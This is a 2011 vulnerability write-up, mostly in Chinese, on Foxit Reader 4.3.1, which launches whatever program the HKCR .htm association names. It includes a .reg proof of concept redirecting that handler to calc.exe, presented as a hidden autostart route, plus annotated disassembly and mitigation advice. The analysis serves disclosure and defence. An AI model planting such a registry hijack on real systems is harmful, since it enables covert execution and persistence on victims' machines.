_ _ (_) | | __ ____ __ _ _ _ _ __ ___ _ __ _ __ ___ | |_ \ \ / /\ \/ /| || | | || '_ ` _ \ | '_ \ | '_ \ / _ \| __| \ V / > < | || |_| || | | | | || |_) |_ | | | || __/| |_ \_/ /_/\_\| | \__,_||_| |_| |_|| .__/(_)|_| |_| \___| \__| _/ | | | |__/ |_| /---------------------------------------------------------------------------------------\ |>...................[ foxit Reader可被利用的vulnerability bug ]...................<| |>......................[ by nEINEI/vxjump.net ]......................<| |>......................[ 2011-05-23 ]......................<| \>...................... [ neineit_at_gmail.com ] .......................用户命令|在线技术支持|福昕软件主页,几处按钮功能未验证要打开的pdf、htm文件所关联的程序是否为浏览器程序,导致可能存在功能失效。不加载pdf文档则上述情况无效。 漏洞利用: 不管用户机器上是否存在相关联的htm程序,都创建一个MyUltralEdit.htm项。 类似如下情况 Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.htm] @="MyUltralEdit.htm" "Content Type"="text/html" "PerceivedType"="text" [HKEY_CLASSES_ROOT\MyUltralEdit.htm\shell\open\command] @="\"c:\\Vuln\\calc.exe\" \"%1\"" 当执行上述操作时,foxit Reader将创建calc.exe进程。这样存在被恶意程序利用的可能,作为一种隐藏的自启动方式。 代码分析: foxit reader v4.3.1.0118 006715D0 6A FF push -0x1 006715D2 68 B0ED9E00 push Foxit_Re.009EEDB0 006715D7 64:A1 00000000 mov eax,dword ptr fs:[0] 006715DD 50 push eax 006715DE 64:8925 0000000>mov dword ptr fs:[0],esp 006715E5 83EC 5C sub esp,0x5C 006715E8 A1 7879BF00 mov eax,dword ptr ds:[0xBF7978] 006715ED 56 push esi 006715EE 57 push edi 006715EF 894424 0C mov dword ptr ss:[esp+0xC],eax 006715F3 C74424 6C 00000>mov dword ptr ss:[esp+0x6C],0x0 006715FB 894424 08 mov dword ptr ss:[esp+0x8],eax 006715FF 8BB424 80000000 mov esi,dword ptr ss:[esp+0x80] //打开浏览器的类型,此时为1,表示用RegQueryValue + CreateProcess 方式 00671606 C64424 6C 01 mov byte ptr ss:[esp+0x6C],0x1 //否则用ShellExecuteW 方式 0067160B 85F6 test esi,esi 0067160D /75 20 jnz XFoxit_Re.0067162F //跳到0067162F 0067160F |8B4424 7C mov eax,dword ptr ss:[esp+0x7C] 00671613 |8B4C24 78 mov ecx,dword ptr ss:[esp+0x78] 00671617 |8B5424 74 mov edx,dword ptr ss:[esp+0x74] 0067161B |50 push 
eax
0067161C |56 push esi
0067161D |56 push esi
0067161E |51 push ecx
0067161F |68 D860B800 push Foxit_Re.00B860D8 ; UNICODE "open"
00671624 |52 push edx
00671625 |FF15 D006D900 call dword ptr ds:[<&SHELL32.ShellExecut>; SHELL32.ShellExecuteW // esi==0 path: ShellExecuteW(.., "open", target, ..)
0067162B |8BF8 mov edi,eax // edi = ShellExecuteW result (a value <= 32 means failure)
0067162D |EB 04 jmp XFoxit_Re.00671633
0067162F \8B7C24 78 mov edi,dword ptr ss:[esp+0x78] // esi!=0 path: continues from the jnz above; edi = the link address to open, here "http://cdn02.foxitsoftware.com/pub/foxit/manual/chs/FoxitReader43_Manual.pdf"
00671633 83FF 20 cmp edi,0x20 // registry/CreateProcess path below is taken when edi <= 0x20 (i.e. ShellExecuteW failed) or esi == 1; otherwise exit at 006717DD
00671636 76 09 jbe XFoxit_Re.00671641
00671638 83FE 01 cmp esi,0x1
0067163B 0F85 9C010000 jnz Foxit_Re.006717DD
00671641 68 04010000 push 0x104 // buffer length 0x104 (MAX_PATH)
00671646 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
0067164A E8 C0F83200 call Foxit_Re.009A0F0F
0067164F 50 push eax
00671650 68 1409C200 push Foxit_Re.00C20914 ; UNICODE ".htm"
00671655 68 00000080 push 0x80000000 // 0x80000000 = HKEY_CLASSES_ROOT
0067165A E8 E1FCFFFF call Foxit_Re.00671340 // RegQueryValue on HKCR\.htm -> ProgID; with the .reg above this is "MyUltralEdit.htm"
0067165F 83C4 0C add esp,0xC
00671662 85C0 test eax,eax // non-zero = lookup failed -> exit
00671664 0F85 73010000 jnz Foxit_Re.006717DD
0067166A 6A FF push -0x1
0067166C 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
00671670 E8 EAF83200 call Foxit_Re.009A0F5F
00671675 68 2CC7B800 push Foxit_Re.00B8C72C ; UNICODE "\shell\open\command"
0067167A 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
0067167E E8 38F83200 call Foxit_Re.009A0EBB
00671683 8B4424 0C mov eax,dword ptr ss:[esp+0xC]
00671687 68 04010000 push 0x104
0067168C 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
00671690 8B70 F8 mov esi,dword ptr ds:[eax-0x8] // esi = length field stored 8 bytes before the string buffer (string-object layout; inferred)
00671693 E8 77F83200 call Foxit_Re.009A0F0F // concatenates "MyUltralEdit.htm\shell\open\command"
00671698 50 push eax
00671699 56 push esi
0067169A 8D4C24 14 lea ecx,dword ptr ss:[esp+0x14]
0067169E E8 6CF83200 call Foxit_Re.009A0F0F
006716A3 50 push eax
006716A4 68 00000080 push 0x80000000 // HKEY_CLASSES_ROOT again
006716A9 E8 92FCFFFF call Foxit_Re.00671340 // second lookup: default value of HKCR\<ProgID>\shell\open\command, here ""C:\vuln\calc.exe" "%1"" -- taken verbatim, nothing checks that it names a browser
006716AE 83C4 0C add esp,0xC
006716B1 85C0 test eax,eax // non-zero = lookup failed -> exit
006716B3 0F85 24010000 jnz Foxit_Re.006717DD
006716B9 6A FF push -0x1
006716BB 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
006716BF E8 9BF83200 call Foxit_Re.009A0F5F
006716C4 6A FF push -0x1
006716C6 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
006716CA E8 90F83200 call Foxit_Re.009A0F5F
006716CF 68 2CDFB800 push Foxit_Re.00B8DF2C ; UNICODE ""%1"" // look for the quoted "%1" placeholder first (0099856E looks like a find returning -1 on miss; 009984D4/009A0C11 presumably substring/replace with the target at [esp+0x80] -- helper semantics inferred, confirm)
006716D4 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
006716D8 E8 916E3200 call Foxit_Re.0099856E
006716DD 83F8 FF cmp eax,-0x1
006716E0 74 2F je XFoxit_Re.00671711
006716E2 8D8C24 80000000 lea ecx,dword ptr ss:[esp+0x80]
006716E9 50 push eax
006716EA 51 push ecx
006716EB 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
006716EF E8 E06D3200 call Foxit_Re.009984D4
006716F4 50 push eax
006716F5 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
006716F9 C64424 70 02 mov byte ptr ss:[esp+0x70],0x2
006716FE E8 0EF53200 call Foxit_Re.009A0C11
00671703 C64424 6C 01 mov byte ptr ss:[esp+0x6C],0x1
00671708 8D8C24 80000000 lea ecx,dword ptr ss:[esp+0x80]
0067170F EB 40 jmp XFoxit_Re.00671751
00671711 68 24DFB800 push Foxit_Re.00B8DF24 ; UNICODE "%1" // no quoted placeholder: try the bare %1
00671716 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
0067171A E8 4F6E3200 call Foxit_Re.0099856E
0067171F 83F8 FF cmp eax,-0x1
00671722 74 32 je XFoxit_Re.00671756
00671724 8D9424 80000000 lea edx,dword ptr ss:[esp+0x80]
0067172B 50 push eax
0067172C 52 push edx
0067172D 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
00671731 E8 9E6D3200 call Foxit_Re.009984D4
00671736 50 push eax
00671737 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
0067173B C64424 70 03 mov byte ptr ss:[esp+0x70],0x3
00671740 E8 CCF43200 call Foxit_Re.009A0C11
00671745 C64424 6C 01 mov byte ptr ss:[esp+0x6C],0x1
0067174A 8D8C24 80000000 lea ecx,dword ptr ss:[esp+0x80]
00671751 E8 74F33200 call Foxit_Re.009A0ACA
00671756 68 0C60B800 push Foxit_Re.00B8600C // neither placeholder found (or after replacement): append the string at 00B8600C and then the target [esp+0x78] to the command line -- presumably a separator; confirm
0067175B 8D4C24 0C lea ecx,dword ptr ss:[esp+0xC]
0067175F E8 57F73200 call Foxit_Re.009A0EBB
00671764 8B4424 78 mov eax,dword ptr ss:[esp+0x78]
00671768 8D4C24 08 lea ecx,dword ptr ss:[esp+0x8]
0067176C 50 push eax
0067176D E8 49F73200 call Foxit_Re.009A0EBB
00671772 B9 11000000 mov ecx,0x11 // zero 0x11 dwords (0x44 bytes) at [esp+0x20] and set cb = 0x44: a STARTUPINFOW (sizeof == 0x44)
00671777 33C0 xor eax,eax
00671779 8D7C24 20 lea edi,dword ptr ss:[esp+0x20]
0067177D 8D5424 20 lea edx,dword ptr ss:[esp+0x20]
00671781 F3:AB rep stos dword ptr es:[edi]
00671783 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
00671787 C74424 20 44000>mov dword ptr ss:[esp+0x20],0x44 // no check that the handler is a browser program; calc.exe is created directly with argument "http://cdn02.foxitsoftware.com/pub/foxit/manual/chs/FoxitReader43_Manual.pdf" // resulting command line: ""C:\vuln\calc.exe" http://cdn02.foxitsoftware.com/pub/foxit/manual/chs/FoxitReader43_Manual.pdf"
0067178F 51 push ecx // lpProcessInformation
00671790 52 push edx // lpStartupInfo
00671791 50 push eax // lpCurrentDirectory = NULL
00671792 50 push eax // lpEnvironment = NULL
00671793 50 push eax // dwCreationFlags = 0
00671794 50 push eax // bInheritHandles = FALSE
00671795 50 push eax // lpThreadAttributes = NULL
00671796 50 push eax // lpProcessAttributes = NULL
00671797 8B4424 28 mov eax,dword ptr ss:[esp+0x28]
0067179B 50 push eax // lpCommandLine = the registry-supplied command with the target substituted
0067179C 6A 00 push 0x0 // lpApplicationName = NULL, so the executable is whatever the first token of the HKCR-supplied command line resolves to
0067179E FF15 1805D900 call dword ptr ds:[<&KERNEL32.CreateProc>; kernel32.CreateProcessW // Mitigation/detection: the fix is to validate the resolved handler (or route through ShellExecuteW only); defenders should audit the HKCR\.htm -> ProgID -> shell\open\command chain (HKCR is a merged view, so per-user Classes keys count too) and watch for non-browser children of Foxit Reader launched with a URL argument // With a hyperlink inside a document, newer Foxit Reader versions cannot be exploited this way; Adobe Reader has no such issue at present.